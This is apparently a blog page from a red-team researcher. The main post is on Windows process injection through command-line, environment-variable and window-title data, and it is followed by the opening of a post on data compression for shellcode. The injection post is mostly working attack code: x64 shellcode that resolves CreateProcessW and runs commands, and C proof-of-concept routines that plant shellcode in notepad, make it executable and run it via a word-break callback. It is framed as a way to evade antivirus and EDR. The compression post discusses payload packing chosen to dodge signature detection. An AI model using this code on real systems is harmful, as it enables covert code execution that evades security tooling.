❌

Normal view

There are new articles available, click to refresh the page.
Before yesterdaymodexp

Windows Process Injection: Command Line and Environment Variables

By: odzhan
31 July 2020 at 04:00

Windows Process Injection: Command Line and Environment Variables

Contents

  1. Introduction
  2. Shellcode
  3. Environment Variables
  4. Command Line
  5. Window Title
  6. Runtime Data

1. Introduction

There are many ways to load shellcode into the address space of a process, but knowing precisely where it’s stored in memory is a bigger problem when we need to execute it. Ideally, a Red Teamer will want to locate their code with the least amount of effort, avoiding memory scrapers/scanners that might alert an antivirus or EDR solution. Adam discussed some ways to avoid using VirtualAllocEx and WriteProcessMemory in a blog post, Inserting data into other processes’ address space. Red Teamers are known to create a new process before injecting data, but I’ve yet to see any examples of using the command line or environment variables to assist with this.

This post examines how CreateProcessW might be used to both start a new process AND inject data simultaneously. Memory for where the data resides will initially have Read-Write (RW) permissions, but this can be changed to Read-Write-Execute (RWX) using VirtualProtectEx. Since notepad will be used to demonstrate these techniques, Wordwarping / EM_SETWORDBREAKPROC is used to execute the shellcode. The main structure of memory being modified for these examples is RTL_USER_PROCESS_PARAMETERS that contains the Environment block, the CommandLine and C RuntimeData information, all of which can be controlled by an actor prior to creation of a new process.

// Per-process startup parameters, reached through the PEB's
// ProcessParameters pointer. The trailing comment on each field is its byte
// offset as listed by the author; the 8-byte spacing of the PVOID fields
// shows this is the 64-bit layout.
// NOTE(review): other published layouts declare EnvironmentSize as a
// pointer-sized integer rather than ULONG -- confirm against the headers
// actually used to build the samples.
typedef struct _RTL_USER_PROCESS_PARAMETERS {
    ULONG MaximumLength;                            //0x0
    ULONG Length;                                   //0x4
    ULONG Flags;                                    //0x8
    ULONG DebugFlags;                               //0xc
    PVOID ConsoleHandle;                            //0x10
    ULONG ConsoleFlags;                             //0x18
    PVOID StandardInput;                            //0x20
    PVOID StandardOutput;                           //0x28
    PVOID StandardError;                            //0x30
    CURDIR CurrentDirectory;                        //0x38
    UNICODE_STRING DllPath;                         //0x50
    UNICODE_STRING ImagePathName;                   //0x60
    UNICODE_STRING CommandLine;                     //0x70
    PVOID Environment;                              //0x80
    ULONG StartingX;                                //0x88
    ULONG StartingY;                                //0x8c
    ULONG CountX;                                   //0x90
    ULONG CountY;                                   //0x94
    ULONG CountCharsX;                              //0x98
    ULONG CountCharsY;                              //0x9c
    ULONG FillAttribute;                            //0xa0
    ULONG WindowFlags;                              //0xa4
    ULONG ShowWindowFlags;                          //0xa8
    UNICODE_STRING WindowTitle;                     //0xb0
    UNICODE_STRING DesktopInfo;                     //0xc0
    UNICODE_STRING ShellInfo;                       //0xd0
    UNICODE_STRING RuntimeData;                     //0xe0
    RTL_DRIVE_LETTER_CURDIR CurrentDirectores[32];  //0xf0
    ULONG EnvironmentSize;                          //0x3f0
} RTL_USER_PROCESS_PARAMETERS, *PRTL_USER_PROCESS_PARAMETERS; 

2. Shellcode

User-supplied shellcodes that contain two consecutive null bytes (\x00\x00) would require an encoder and decoder, such as Base64. The following code resolves the address of CreateProcessW and executes a command supplied by the word break callback. The PoC will set the command using WM_SETTEXT.

      bits 64
      
      %include "include.inc"
      
      ; Stack frame laid out by createproc for its call to CreateProcessW.
      ;   .hs                      home (shadow) space for the four register
      ;                            arguments
      ;   .bInheritHandles ..      stack slots for arguments 5-10, in call order
      ;   .lpProcessInformation
      ;   .procinfo / .startupinfo storage for the PROCESS_INFORMATION and
      ;                            STARTUPINFO structures passed by pointer
      ; home_space_size, PROCESS_INFORMATION_size and STARTUPINFO_size are
      ; expected to come from include.inc.
      struc stk_mem
        .hs                   resb home_space_size
        
        .bInheritHandles      resq 1
        .dwCreationFlags      resq 1
        .lpEnvironment        resq 1
        .lpCurrentDirectory   resq 1
        .lpStartupInfo        resq 1
        .lpProcessInformation resq 1
        
        .procinfo             resb PROCESS_INFORMATION_size
        .startupinfo          resb STARTUPINFO_size
      endstruc

      ; Frame size rounded up to 16 bytes, minus 8. createproc loads this
      ; through AL, so the value must fit in a single byte.
      ; NOTE(review): the -8 presumably offsets the return address so that rsp
      ; is 16-byte aligned at the call; that only holds if pushx pushes an even
      ; number of qwords -- confirm against include.inc.
      ; The expression is fully parenthesised so it expands safely inside any
      ; larger expression.
      %define stk_size (((stk_mem_size + 15) & -16) - 8)
      
      %ifndef BIN
        global createproc
      %endif
      
      ; void createproc(WCHAR cmd[]);
      ;
      ; Finds CreateProcessW by walking the loader's module list from the PEB
      ; and hashing each module's export names, then calls
      ;   CreateProcessW(NULL, cmd, NULL, NULL, FALSE, 0, NULL, NULL, &si, &pi)
      ; with si and pi stored in the local stk_mem frame.
      ;
      ; In:   rcx = cmd (pointer to the command-line buffer)
      ; Out:  eax = 0 (the CreateProcessW return value is discarded)
      ; Note: pushx/popx are macros from include.inc and are not shown here.
createproc:
      ; save non-volatile registers
      pushx  rsi, rbx, rdi, rbp
      
      ; allocate stack memory for arguments + home space
      ; (stk_size is loaded through al, so it has to fit in one byte)
      xor    eax, eax
      mov    al, stk_size
      sub    rsp, rax
      
      ; save pointer to buffer (popped back into rdx just before the call)
      push   rcx
      
      ; r11 = offset of TEB.ProcessEnvironmentBlock; reused below at scan_dll
      push   TEB.ProcessEnvironmentBlock
      pop    r11
      mov    rax, [gs:r11]         ; rax = PEB
      mov    rax, [rax+PEB.Ldr]    ; rax = PEB.Ldr
      mov    rdi, [rax+PEB_LDR_DATA.InLoadOrderModuleList + LIST_ENTRY.Flink]
      jmp    scan_dll
next_dll:    
      ; advance to the next module in load order
      mov    rdi, [rdi+LDR_DATA_TABLE_ENTRY.InLoadOrderLinks + LIST_ENTRY.Flink]
scan_dll:
      mov    rbx, [rdi+LDR_DATA_TABLE_ENTRY.DllBase]

      mov    esi, [rbx+IMAGE_DOS_HEADER.e_lfanew]
      ; Bias esi by TEB.ProcessEnvironmentBlock; the same constant is
      ; subtracted again in the displacement below, so the effective address is
      ; unchanged. NOTE(review): presumably done to shrink the encoded
      ; displacement -- confirm.
      add    esi, r11d             ; add 60h or TEB.ProcessEnvironmentBlock
      ; ecx = IMAGE_DATA_DIRECTORY[IMAGE_DIRECTORY_ENTRY_EXPORT].VirtualAddress
      mov    ecx, [rbx+rsi+IMAGE_NT_HEADERS.OptionalHeader + \
                           IMAGE_OPTIONAL_HEADER.DataDirectory + \
                           IMAGE_DIRECTORY_ENTRY_EXPORT * IMAGE_DATA_DIRECTORY_size + \
                           IMAGE_DATA_DIRECTORY.VirtualAddress - \
                           TEB.ProcessEnvironmentBlock]
      jecxz  next_dll              ; if no exports, try next DLL in list
      ; rsi = address of IMAGE_EXPORT_DIRECTORY.NumberOfNames; the lodsd
      ; instructions below then read the consecutive dword fields after it
      lea    rsi, [rbx+rcx+IMAGE_EXPORT_DIRECTORY.NumberOfNames]
      lodsd                        ; eax = NumberOfNames
      xchg   eax, ecx
      jecxz  next_dll              ; if no names, try next DLL in list
      
      ; r8 = IMAGE_EXPORT_DIRECTORY.AddressOfFunctions
      lodsd
      xchg   eax, r8d              ;
      add    r8, rbx               ; r8 = RVA2VA(r8, rbx)
      ; ebp = IMAGE_EXPORT_DIRECTORY.AddressOfNames
      lodsd
      xchg   eax, ebp              ;
      add    rbp, rbx              ; rbp = RVA2VA(rbp, rbx)
      ; r9 = IMAGE_EXPORT_DIRECTORY.AddressOfNameOrdinals      
      lodsd
      xchg   eax, r9d
      add    r9, rbx               ; r9 = RVA2VA(r9, rbx)
      ; Walk the name table from the last entry down; rcx = names remaining.
find_api:
      mov    esi, [rbp+rcx*4-4]    ; esi = AddressOfNames[rcx-1] (RVA of name)
      add    rsi, rbx
      xor    eax, eax
      cdq                          ; edx = 0 (hash accumulator)
      ; Hash: for each byte, edx = ror(edx + byte, 8). The loop ends after the
      ; byte whose decrement sets the sign bit, i.e. the NUL terminator (a byte
      ; above 80h would end it as well).
hash_api:
      lodsb
      add    edx, eax
      ror    edx, 8
      dec    al
      jns    hash_api
      cmp    edx, 0x1b929a47       ; CreateProcessW
      ; loopne decrements rcx, so on a match rcx is the index of that name
      loopne find_api              ; loop until found or no names left
      
      jnz    next_dll              ; not found? goto next_dll
      
      movzx  eax, word[r9+rcx*2]   ; eax = AddressOfNameOrdinals[rcx]
      mov    eax, [r8+rax*4]       ; eax = AddressOfFunctions[ordinal] (RVA)
      add    rbx, rax              ; rbx = DllBase + RVA = function address
      
      ; CreateProcess(NULL, cmd, NULL, NULL, 
      ;   FALSE, 0, NULL, &si, &pi);
      pop    rdx           ; lpCommandLine = buffer for Edit
      xor    r8, r8        ; lpProcessAttributes = NULL
      xor    r9, r9        ; lpThreadAttributes = NULL
      xor    eax, eax
      mov    [rsp+stk_mem.bInheritHandles     ], rax ; bInheritHandles      = FALSE
      mov    [rsp+stk_mem.dwCreationFlags     ], rax ; dwCreationFlags      = 0
      mov    [rsp+stk_mem.lpEnvironment       ], rax ; lpEnvironment        = NULL
      mov    [rsp+stk_mem.lpCurrentDirectory  ], rax ; lpCurrentDirectory   = NULL
      
      lea    rdi, [rsp+stk_mem.procinfo       ]
      mov    [rsp+stk_mem.lpProcessInformation], rdi ; lpProcessInformation = &pi
      ; (pi itself is not cleared before the call)

      lea    rdi, [rsp+stk_mem.startupinfo    ]
      mov    [rsp+stk_mem.lpStartupInfo       ], rdi ; lpStartupInfo        = &si
      
      ; Initialise si: first dword = structure size, remaining bytes = 0.
      ; The string stores assume the direction flag is clear -- TODO confirm.
      xor    ecx, ecx
      push   STARTUPINFO_size
      pop    rax
      stosd                         ; si.cb = sizeof(STARTUPINFO)
      sub    rax, 4
      xchg   eax, ecx               ; ecx = bytes left to clear, eax = 0
      rep    stosb                  ; zero rest of si; rcx ends 0 = lpApplicationName NULL
      call   rbx
      
      ; deallocate stack
      xor    eax, eax
      mov    al, stk_size
      add    rsp, rax
      xor    eax, eax               ; return 0
      
      ; restore non-volatile registers
      popx   rsi, rbx, rdi, rbp  
      ret

3. Environment Variables

Environment variables have been part of Unix since 1979 and MS-DOS/Windows since 1982. According to MSDN, the maximum size of a user-defined variable is 32,767 characters. 32KB should be sufficient for most shellcode, but if not, you have the option of using multiple variables for anything else.

There are a few ways to inject using variables, but I found the easiest approach to be setting one in the current process with SetEnvironmentVariable, and then allowing CreateProcessW to transfer or propagate all of them to the new process by setting the lpEnvironment parameter to NULL.

    // Excerpt from var_inject: stores the payload as the value of a randomly
    // named environment variable, then starts notepad so that it inherits
    // this process's environment (lpEnvironment == NULL).

    // generate random name
    // (each character is a random upper- or lower-case ASCII letter; assumes
    // name is zero-initialised and longer than MAX_NAME_LEN, as declared in
    // var_inject, so it stays NUL-terminated)
    srand(time(0));
    for(i=0; i<MAX_NAME_LEN; i++) {
      name[i] = ((rand() % 2) ? L'a' : L'A') + (rand() % 26);
    }
    
    // set variable in this process space with our shellcode
    // NOTE(review): the value is handled as a wide string, so it ends at the
    // first 16-bit zero in WINEXEC -- verify the payload encoding.
    SetEnvironmentVariable(name, (PWCHAR)WINEXEC);
    
    // create a new process using 
    // environment variables from this process
    ZeroMemory(&si, sizeof(si));
    si.cb          = sizeof(si);
    si.dwFlags     = STARTF_USESHOWWINDOW;
    si.wShowWindow = SW_SHOWDEFAULT;
    
    // NOTE(review): if this resolves to CreateProcessW, the documented
    // contract allows lpCommandLine to be modified in place, which makes a
    // string literal unsafe here -- confirm. The return value is not checked.
    CreateProcess(NULL, L"notepad", NULL, NULL, 
      FALSE, 0, NULL, NULL, &si, &pi);

Variable names are stored in memory alphabetically and will appear in the same order for the new process so long as lpEnvironment for CreateProcess is set to NULL. The PoC here will locate the address of the shellcode inside the current environment block, then subtract the base address to obtain the relative virtual address (RVA).

// return relative virtual address of environment block
// Return the byte offset, measured from the start of this process's
// environment block, of the value of the variable called `name`.
//
//   name    NUL-terminated variable name (matched case-sensitively)
//   returns offset of the first character after "name=", or 0 when the
//           variable is absent or the arguments are unusable. 0 is never a
//           valid result, because a value always follows "name=".
//
// The whole name is compared and must be followed by '=', so a variable that
// merely shares a prefix with `name` is not mistaken for it.
DWORD get_var_rva(PWCHAR name) {
    PWCHAR env, str;
    size_t namelen;

    if(name == NULL || *name == 0) return 0;
    namelen = wcslen(name);

    // base of the environment block for the current process
    env = (PWCHAR)NtCurrentTeb()->ProcessEnvironmentBlock->ProcessParameters->Environment;
    if(env == NULL) return 0;

    // the block is a sequence of NUL-terminated "name=value" strings that
    // ends with an empty string
    for(str = env; *str != 0; str += wcslen(str) + 1) {
      if(wcsncmp(str, name, namelen) == 0 && str[namelen] == L'=') {
        // offset of the value, in bytes, relative to the block base
        return (DWORD)((PBYTE)&str[namelen + 1] - (PBYTE)env);
      }
    }
    return 0;
}

Once we have the RVA in the local process, read the address of the environment block in the remote process and add the RVA to it.

// get the address of environment block
// Read the address and size of the environment block of another process.
//
//   hp      process handle; the calls below need query and VM-read access
//   envlen  receives the size of the environment block in bytes
//           (set to 0 on failure; may be NULL if the size is not wanted)
//   returns address of the environment block inside the target process,
//           or NULL if any step fails
//
// Every step is checked so that uninitialised stack data is never returned
// as a remote address.
PVOID var_get_env(HANDLE hp, PDWORD envlen) {
    NTSTATUS                    nts;
    PROCESS_BASIC_INFORMATION   pbi;
    RTL_USER_PROCESS_PARAMETERS upp;
    PEB                         peb;
    ULONG                       len = 0;
    SIZE_T                      rd = 0;

    if(envlen != NULL) *envlen = 0;

    // get the address of PEB
    nts = NtQueryInformationProcess(
        hp, ProcessBasicInformation,
        &pbi, sizeof(pbi), &len);

    // negative NTSTATUS values indicate failure
    if(nts < 0 || pbi.PebBaseAddress == NULL) return NULL;

    // get the address RTL_USER_PROCESS_PARAMETERS
    if(!ReadProcessMemory(
      hp, pbi.PebBaseAddress,
      &peb, sizeof(PEB), &rd)) return NULL;

    if(peb.ProcessParameters == NULL) return NULL;

    // get the address of Environment block
    if(!ReadProcessMemory(
      hp, peb.ProcessParameters,
      &upp, sizeof(RTL_USER_PROCESS_PARAMETERS), &rd)) return NULL;

    if(envlen != NULL) *envlen = (DWORD)upp.EnvironmentSize;
    return upp.Environment;
}

The full routine will copy the user-supplied command to the Edit control and the shellcode will receive this when the word break callback is executed. You don’t need to use Notepad, but I just wanted to avoid the usual methods of executing code via RtlCreateUserThread or CreateRemoteThread. Figure 1 shows the shellcode stored as an environment variable. See var_inject.c for more details.

Figure 1. Environment variable of new process containing shellcode.

// Proof of concept for section 3: places WINEXEC in a randomly named
// environment variable, starts notepad so the variable is inherited, copies
// `cmd` into notepad's Edit control, and then has the Edit control call the
// inherited data through its word-break callback.
//
//   cmd   text placed in the Edit control with WM_SETTEXT
//
// NOTE(review): none of the API return values are checked; `rva` is declared
// but never used; the `cleanup:` label has no matching goto in this block;
// and `pi` is read at cleanup even if CreateProcess failed and left it
// unset.
void var_inject(PWCHAR cmd) {
    STARTUPINFO         si;
    PROCESS_INFORMATION pi;
    WCHAR               name[MAX_PATH]={0};    
    INT                 i; 
    PVOID               va;
    DWORD               rva, old, len;
    PVOID               env;
    HWND                npw, ecw;

    // generate random name
    // (only the first MAX_NAME_LEN elements are written; the zero-initialised
    // remainder of the array terminates the string)
    srand(time(0));
    for(i=0; i<MAX_NAME_LEN; i++) {
      name[i] = ((rand() % 2) ? L'a' : L'A') + (rand() % 26);
    }
    
    // set variable in this process space with our shellcode
    SetEnvironmentVariable(name, (PWCHAR)WINEXEC);
    
    // create a new process using 
    // environment variables from this process
    ZeroMemory(&si, sizeof(si));
    si.cb          = sizeof(si);
    si.dwFlags     = STARTF_USESHOWWINDOW;
    si.wShowWindow = SW_SHOWDEFAULT;
    
    // NOTE(review): a string literal is passed as lpCommandLine; the wide
    // variant of CreateProcess is documented as able to modify that buffer.
    CreateProcess(NULL, L"notepad", NULL, NULL, 
      FALSE, 0, NULL, NULL, &si, &pi);
     
    // wait for process to initialize
    // if you don't wait, there can be a race condition
    // reading the correct Environment address from new process    
    WaitForInputIdle(pi.hProcess, INFINITE);
    
    // the command to execute is just pasted into the notepad
    // edit control.
    // NOTE(review): FindWindow returns a top-level window of class "Notepad",
    // which is not necessarily the one belonging to pi -- confirm.
    npw = FindWindow(L"Notepad", NULL);
    ecw = FindWindowEx(npw, NULL, L"Edit", NULL);
    SendMessage(ecw, WM_SETTEXT, 0, (LPARAM)cmd);
    
    // get the address of environment block in new process
    // then calculate the address of shellcode
    // (the offset is measured in this process and applied to the remote base)
    env = var_get_env(pi.hProcess, &len);
    va = (PBYTE)env + get_var_rva(name);

    // set environment block to RWX
    VirtualProtectEx(pi.hProcess, env, 
      len, PAGE_EXECUTE_READWRITE, &old);

    // execute shellcode
    // (install va as the word-break callback, send a double-click whose
    // lParam packs the position 10,10, then remove the callback again)
    SendMessage(ecw, EM_SETWORDBREAKPROC, 0, (LPARAM)va);
    SendMessage(ecw, WM_LBUTTONDBLCLK, MK_LBUTTON, (LPARAM)0x000a000a);
    SendMessage(ecw, EM_SETWORDBREAKPROC, 0, (LPARAM)NULL);
    
cleanup:
    // cleanup and exit
    // (passing NULL as the value deletes the variable from this process)
    SetEnvironmentVariable(name, NULL);
    
    if(pi.hProcess != NULL) {
      CloseHandle(pi.hThread);
      CloseHandle(pi.hProcess);
    }
}

4. Command Line

This can be easier to work with than environment variables. For this example, only the shellcode itself is used and that can be located easily in the PEB.

    // Excerpt from cmd_inject: starts notepad with WINEXEC supplied as the
    // command-line string.
    #define NOTEPAD_PATH L"%SystemRoot%\\system32\\notepad.exe"

    // resolve %SystemRoot% into `path` (return value is not checked)
    ExpandEnvironmentStrings(NOTEPAD_PATH, path, MAX_PATH);
    
    // create a new process using shellcode as command line
    ZeroMemory(&si, sizeof(si));
    si.cb          = sizeof(si);
    si.dwFlags     = STARTF_USESHOWWINDOW;
    si.wShowWindow = SW_SHOWDEFAULT;
    
    // path is the application name; WINEXEC is passed as lpCommandLine.
    // NOTE(review): the return value is not checked.
    CreateProcess(path, (PWCHAR)WINEXEC, NULL, NULL, 
      FALSE, 0, NULL, NULL, &si, &pi);

Reading is much the same as reading environment variables since they both reside inside RTL_USER_PROCESS_PARAMETERS.

// get the address of command line
// Read the address and length of the command-line string of another process.
//
//   hp      process handle; the calls below need query and VM-read access
//   cmdlen  receives CommandLine.Length, the string length in bytes
//           (set to 0 on failure; may be NULL if the length is not wanted)
//   returns address of the command-line buffer inside the target process,
//           or NULL if any step fails
//
// Every step is checked so that uninitialised stack data is never returned
// as a remote address.
PVOID get_cmdline(HANDLE hp, PDWORD cmdlen) {
    NTSTATUS                    nts;
    PROCESS_BASIC_INFORMATION   pbi;
    RTL_USER_PROCESS_PARAMETERS upp;
    PEB                         peb;
    ULONG                       len = 0;
    SIZE_T                      rd = 0;

    if(cmdlen != NULL) *cmdlen = 0;

    // get the address of PEB
    nts = NtQueryInformationProcess(
        hp, ProcessBasicInformation,
        &pbi, sizeof(pbi), &len);

    // negative NTSTATUS values indicate failure
    if(nts < 0 || pbi.PebBaseAddress == NULL) return NULL;

    // get the address RTL_USER_PROCESS_PARAMETERS
    if(!ReadProcessMemory(
      hp, pbi.PebBaseAddress,
      &peb, sizeof(PEB), &rd)) return NULL;

    if(peb.ProcessParameters == NULL) return NULL;

    // get the address of command line
    if(!ReadProcessMemory(
      hp, peb.ProcessParameters,
      &upp, sizeof(RTL_USER_PROCESS_PARAMETERS), &rd)) return NULL;

    if(cmdlen != NULL) *cmdlen = upp.CommandLine.Length;
    return upp.CommandLine.Buffer;
}

Figure 2 illustrates what Process Explorer might show for the new process. See cmd_inject.c for more details.

Figure 2. Command line of new process containing shellcode.

// Path of the program to start; %SystemRoot% is expanded at run time.
#define NOTEPAD_PATH L"%SystemRoot%\\system32\\notepad.exe"

// Proof of concept for section 4: starts notepad with WINEXEC as its command
// line, copies `cmd` into the Edit control, and then has the Edit control
// call the command-line buffer through its word-break callback.
//
//   cmd   text placed in the Edit control with WM_SETTEXT
//
// NOTE(review): none of the API return values are checked, and `rva` is
// declared but never used.
void cmd_inject(PWCHAR cmd) {
    STARTUPINFO         si;
    PROCESS_INFORMATION pi;
    WCHAR               path[MAX_PATH]={0};
    DWORD               rva, old, len;
    PVOID               cmdline;
    HWND                npw, ecw;

    ExpandEnvironmentStrings(NOTEPAD_PATH, path, MAX_PATH);
    
    // create a new process using shellcode as command line
    ZeroMemory(&si, sizeof(si));
    si.cb          = sizeof(si);
    si.dwFlags     = STARTF_USESHOWWINDOW;
    si.wShowWindow = SW_SHOWDEFAULT;
    
    CreateProcess(path, (PWCHAR)WINEXEC, NULL, NULL, 
      FALSE, 0, NULL, NULL, &si, &pi);
     
    // wait for process to initialize
    // if you don't wait, there can be a race condition
    // reading the correct command line from new process  
    WaitForInputIdle(pi.hProcess, INFINITE);
    
    // the command to execute is just pasted into the notepad
    // edit control.
    // NOTE(review): FindWindow returns a top-level window of class "Notepad",
    // which is not necessarily the one belonging to pi -- confirm.
    npw = FindWindow(L"Notepad", NULL);
    ecw = FindWindowEx(npw, NULL, L"Edit", NULL);
    SendMessage(ecw, WM_SETTEXT, 0, (LPARAM)cmd);
    
    // get the address of command line in new process
    // which contains our shellcode
    // (len receives CommandLine.Length from the remote process)
    cmdline = get_cmdline(pi.hProcess, &len);
    
    // set the address to RWX
    VirtualProtectEx(pi.hProcess, cmdline, 
      len, PAGE_EXECUTE_READWRITE, &old);
    
    // execute shellcode
    // (install cmdline as the word-break callback, send a double-click whose
    // lParam packs the position 10,10, then remove the callback again)
    SendMessage(ecw, EM_SETWORDBREAKPROC, 0, (LPARAM)cmdline);
    SendMessage(ecw, WM_LBUTTONDBLCLK, MK_LBUTTON, (LPARAM)0x000a000a);
    SendMessage(ecw, EM_SETWORDBREAKPROC, 0, (LPARAM)NULL);
    
    CloseHandle(pi.hThread);
    CloseHandle(pi.hProcess);
}

5. Window Title

IMHO, this is the best of the three because the lpTitle field of STARTUPINFO only applies to console processes. If a GUI like notepad is selected, process explorer doesn’t show any unusual characters for various properties. Set lpTitle to the shellcode and CreateProcessW will inject. As with the other two methods, the address can be obtained via the PEB.

    // Excerpt: same STARTUPINFO setup as the earlier samples, with the
    // payload additionally assigned to the lpTitle field.
    // create a new process using shellcode as window title
    ZeroMemory(&si, sizeof(si));
    si.cb          = sizeof(si);
    si.dwFlags     = STARTF_USESHOWWINDOW;
    si.wShowWindow = SW_SHOWDEFAULT;
    si.lpTitle     = (PWCHAR)WINEXEC;

6. Runtime Data

Two fields (cbReserved2 and lpReserved2) in the STARTUPINFO structure are, according to Microsoft, “Reserved for use by the C Run-time” and must be NULL or zero prior to calling CreateProcess. The maximum amount of data that can be transferred into a new process is 65,536 bytes, but my experiment with it resulted in the new process failing to execute. The fault was in ucrtbase.dll likely because lpReserved2 didn’t point to the data it expected.

While it didn’t work for me, that’s not to say it can’t work with some additional tweaking.

Sources

Shellcode: Data Compression

By: odzhan
8 December 2019 at 15:00

Introduction

This post examines data compression algorithms suitable for position-independent codes and assumes you’re already familiar with the concept and purpose of data compression. For those of you curious to know more about the science, or information theory, read Data Compression Explained by Matt Mahoney. For historical perspective, read History of Lossless Data Compression Algorithms. Charles Bloom has a great blog on the subject that goes way over my head. For questions and discussions, Encode’s Forum is popular among experts and should be able to help with any queries you have.

For shellcode, algorithms based on the following conditions are considered:

  1. Compact decompressor.
  2. Good compression ratio.
  3. Portable across operating systems and architectures.
  4. Difficult to detect by signature.
  5. Unencumbered by patents and licensing.

Meeting the requirements isn’t that easy. Search for “lightweight compression algorithms” and you’ll soon find recommendations for algorithms that aren’t compact at all. It’s not an issue on machines with 1TB hard drives of course. It’s a problem for resource-constrained environments like microcontrollers and wireless sensors. The best algorithms are usually optimized for speed. They contain arrays and constants that allow them to be easily identified with signature-based tools.

Algorithms that are compact might have suboptimal compression ratios. The compressor component is closed source or restricted by licensing. There is light at the end of the tunnel, however, thanks primarily to the efforts of those designing executable compression. First, we look at those algorithms and then what Windows API can be used as an alternative. There are open source libraries designed for interoperability that support Windows compression on other platforms like Linux.

Table of contents

  1. Executable Compression
  2. Windows NT Layer DLL
  3. Windows Compression API
  4. Windows Packaging API
  5. Windows Imaging API
  6. Direct3D HLSL Compiler
  7. Windows-internal libarchive library
  8. LibreSSL Cryptography Library
  9. Windows.Storage.Compression
  10. Windows Undocumented API
  11. Summary

1. Executable Compression

The first tool known to compress executables and save disk space was Realia SpaceMaker published sometime in 1982 by Robert Dewar. The first virus known to use compression in its infection routine was Cruncher published in June 1993. The author of Cruncher used routines from the disk reduction utility for DOS called DIET. Later on, many different viruses utilized compression as part of their infection routine to reduce the size of infected files, presumably to help evade detection longer. Although completely unrelated to shellcode, I decided to look at e-zines from twenty years ago when there was a lot of interest in using lightweight compression algorithms.

The following list of viruses used compression back in the late 90s/early 00s. It’s not an extensive list, as I only searched the more popular e-zines like 29A and Xine by iKX.

  • Redemption, by Jacky Qwerty/29A
  • Inca, Hybris, by Vecna/29A
  • Aldebaran, by Bozo/iKX
  • Legacy, Thorin, Rhapsody, Forever, by Billy Belcebu/iKX
  • BeGemot, HIV, Vulcano, Benny, Milennium, by Benny/29A
  • Junkmail, Junkhtmail, by roy g biv/29A/defjam

The following compression engines were examined. A 1MB EXE file was used as the raw data and not all of them were tested.

BCE that appeared in 29a#4 was disappointing with only an 8% compression ratio. BNCE that appeared in DCA#1 was no better at 9%, although the decompressor is only 54 bytes. The decompressor for LSCE is 25 bytes, but the compressor simply encodes repeated sequences of zero and nothing else. JQCoding has a ~20% compression ratio while LZCE provides the best at 36%. With exception to the last two mentioned, I was unable to find anything in the e-zines with a good compression ratio. They were super tiny, but also super eh..inefficient. Worth a mention is KITTY, by snowcat.

While I could be wrong, the earliest example of compression being used to unpack shellcode can be found in a generator written by Z0MBiE/29A in 2004. (shown in figure 1). NRV compression algorithms, similar to what’s used in UPX, were re-purposed to decompress the shellcode (see freenrv2 for more details).

Figure 1: Shellcode constructor by Z0MBiE/29A

UPX is a very popular tool for executable compression based on UCL. Included with the source is a PE packer example called UCLpack (thanks Peter) which is ideal for shellcode, too. aPLib also provides good compression ratio and the decompressor doesn’t contain lots of unique constants that would assist in detection by signature. The problem is that the compressor isn’t open source and requires linking with static or dynamic libraries compiled by the author. Thankfully, an open-source implementation by Emmanuel Marty is available and this is also ideal for shellcode.

Other libraries worth mentioning that I didn’t think were entirely suitable are Tiny Inflate and uzlib. The rest of this post focuses on compression provided by various Windows API.

2. Windows NT Layer DLL

Used by the Sofacy group to decompress a payload, RtlDecompressBuffer is also popular for PE Packers and in-memory execution. rtlcompress.c demonstrates using the API.

  • Compression

Obtain the size of the workspace required for compression via the RtlGetCompressionWorkSpaceSize API. Allocate memory for the compressed data and pass both memory buffer and the raw data to RtlCompressBuffer. The following example in C demonstrates this.

// Compress `inbuf` with the ntdll RTL compression routines and write the
// result to `outfile` as: [DWORD original length][compressed bytes].
//
//   engine   compression format; COMPRESSION_ENGINE_MAXIMUM is OR-ed in
//   inbuf    data to compress
//   inlen    size of inbuf in bytes
//   outfile  handle opened for writing
//   returns  number of compressed bytes written, or 0 on any failure
//
// The output buffer is the same size as the input, so data that does not
// shrink makes RtlCompressBuffer fail and nothing is written.
DWORD CompressBuffer(DWORD engine, LPVOID inbuf, DWORD inlen, HANDLE outfile) {      
    ULONG                            wspace = 0, fspace = 0;
    ULONG                            outlen = 0;   // API writes a ULONG here
    DWORD                            len = 0, result = 0;
    NTSTATUS                         nts;
    PVOID                            ws, outbuf;
    HMODULE                          m;
    RtlGetCompressionWorkSpaceSize_t RtlGetCompressionWorkSpaceSize;
    RtlCompressBuffer_t              RtlCompressBuffer;

    // nothing to compress
    if(inbuf == NULL || inlen == 0) return 0;
      
    // the module name is a narrow string, so call the ANSI variant explicitly
    m = GetModuleHandleA("ntdll");
    RtlGetCompressionWorkSpaceSize = (RtlGetCompressionWorkSpaceSize_t)GetProcAddress(m, "RtlGetCompressionWorkSpaceSize");
    RtlCompressBuffer              = (RtlCompressBuffer_t)GetProcAddress(m, "RtlCompressBuffer");
        
    if(RtlGetCompressionWorkSpaceSize == NULL || RtlCompressBuffer == NULL) {
      printf("Unable to resolve RTL API\n");
      return 0;
    }
        
    // 1. obtain the size of workspace
    nts = RtlGetCompressionWorkSpaceSize(
      engine | COMPRESSION_ENGINE_MAXIMUM, 
      &wspace, &fspace);
          
    if(nts == 0) {
      // 2. allocate memory for workspace
      ws = malloc(wspace); 
      if(ws != NULL) {
        // 3. allocate memory for output 
        outbuf = malloc(inlen);
        if(outbuf != NULL) {
          // 4. compress data
          nts = RtlCompressBuffer(
            engine | COMPRESSION_ENGINE_MAXIMUM, 
            inbuf, inlen, outbuf, inlen, 0, 
            &outlen, ws); 
              
          if(nts == 0) {
            // 5. write the original length, then
            // 6. write compressed data to file;
            // report success only when both writes succeed
            if(WriteFile(outfile, &inlen, sizeof(DWORD), &len, 0) &&
               WriteFile(outfile, outbuf, outlen, &len, 0)) {
              result = outlen;
            }
          }
          // 7. free output buffer
          free(outbuf);
        }
        // 8. free workspace
        free(ws);
      }
    }
    return result;
}
  • Decompression

LZNT1 and Xpress data can be unpacked using RtlDecompressBuffer, however, Xpress Huffman data can only be unpacked using RtlDecompressBufferEx or the multi-threaded RtlDecompressBufferEx2. The last two require a WorkSpace buffer.

    // Function-pointer type used to call RtlDecompressBufferEx after it has
    // been resolved from ntdll at run time with GetProcAddress.
    typedef NTSTATUS (WINAPI *RtlDecompressBufferEx_t)(
      USHORT                 CompressionFormatAndEngine,
      PUCHAR                 UncompressedBuffer,
      ULONG                  UncompressedBufferSize,
      PUCHAR                 CompressedBuffer,
      ULONG                  CompressedBufferSize,
      PULONG                 FinalUncompressedSize,
      PVOID                  WorkSpace);
      
// Decompress data laid out as [DWORD original length][compressed bytes] with
// RtlDecompressBufferEx and write the result to `outfile`.
//
//   engine   compression format; COMPRESSION_ENGINE_MAXIMUM is OR-ed in
//   inbuf    length header followed by the compressed data
